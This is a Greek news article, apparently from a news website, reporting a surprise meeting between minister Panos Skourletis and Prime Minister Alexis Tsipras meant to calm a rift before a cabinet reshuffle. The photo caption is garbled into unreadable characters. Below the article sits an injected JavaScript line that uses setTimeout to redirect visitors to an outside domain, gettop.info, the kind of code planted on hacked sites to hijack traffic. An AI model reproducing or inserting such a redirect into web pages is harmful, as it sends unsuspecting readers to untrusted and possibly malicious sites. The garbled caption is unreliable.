Αιφνιδιασμός: Ο Σκουρλέτης στον Τσίπρα -Προσπάθεια να κλείσει το μέτωπο

0
4
ӵ�񟡳破ﵠʵ⥱�骯�ﵫ߯�ݣᱯ ̡ﵬ ʵ񩡪ޠ21 ɯ��15. (EUROKINISSI/ԁԉM`̐ϋQǩ

Αιφνιδιαστική συνάντηση με τον Αλέξη Τσίπρα στο Μέγαρο Μαξίμου είχε ο Πάνος Σκουρλέτης, σε μια προσπάθεια να εκτονωθεί η ένταση στο εσωτερικό της κυβέρνησης.

Ο πρωθυπουργός φέρεται να τον διαβεβαίωσε ότι δεν έχει σχέση με τις διαρροές στα ΜΜΕ, που όλες τις τελευταίες μέρες προαναγγέλουν την απομάκρυνσή του από την κυβέρνηση. Και επιχείρησε να τον πείσει ότι μόνο για λόγους  γυναικείας ποσόστωσης δεν τον περιέλαβε στην πρότασή του για το νέο πολιτικό συμβούλιο του κόμματος. Του ζήτησε δε να ρίξει τους τόνους δημοσίως, διότι πλήττεται η εικόνα της κυβέρνησης σε μα εξαιρετικά δύσκολη στιγμή.

Ο υπουργός Περιβάλλοντος φάνηκε να ικανοποιήθηκε από τις διευκρινίσεις του πρωθυπουργού, με αποτέλεσμα να χαρακτηρίσει όσα γράφονται ως «ανακρίβειες και κατασκευασμένες διαρροές»

Και να προσθέσει: «Είναι φανερό ότι οι αντίπαλοι του Σύριζα και της κυβέρνησης επιθυμούν να δημιουργήσουν εικόνα κρίσης. Είμαι απόλυτα πεισμένος πως αυτό που πρέπει να χαρακτηρίζει την δράση μας είναι η συλλογικότητα, το ηθικό πλεονέκτημα και ο επαγγελματισμός με την έννοια της τεκμηριωμένης ανάλυσης της πραγματικότητας και της κατάθεσης εναλλακτικών προτάσεων. Όλα αυτά, για μας του Σύριζα αποτελούν την κοινή μας κουλτούρα. Όπως είναι επίσης γνωστό, πως στο κόμμα μας έχουμε  κατακτήσει την κουλτούρα του διαλόγου. Στο τελευταίο συνέδριό μας βγήκαμε με μια πολιτική απόφαση που εγκρίθηκε από τη συντριπτική πλειοψηφία των συνέδρων.  Με αυτά το όπλα πορευόμαστε φιλοδοξώντας να φανούμε αντάξιοι των προσδοκιών του λαού μας».

Για τη συνάντηση κυβερνητική πηγή επισήμανε στο ΑΜΠΕ ότι «τερματίζεται, έτσι, η περιρρέουσα ατμόσφαιρα περί δήθεν ρήξης στις σχέσεις μεταξύ του πρωθυπουργού και του υπουργού».

Σημαίνουν, άραγε, αυτά πως έκλεισε η πληγή που είχε ανοίξει στις σχέσεις τους ή πρόκειται για ανακωχή; Η απάντηση θα δοθεί στον ανασχηματισμό. Θα διατηρήσει ο Σκουρλέτης το χαρτοφυλάκιο της Ενέργειας, παρά την κάθετη διαφωνία του με την ιδιωτικοποίηση του 17% στη ΔΕΗ; Ή θα πάει σπίτι του; Ή μήπως θα βάλει νερό στο κρασί του και θα δεχθεί να μετακινηθεί σε άλλο υπουργείο, πράγμα που έως χθες αρνείτο κατηγορηματικά;

 

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here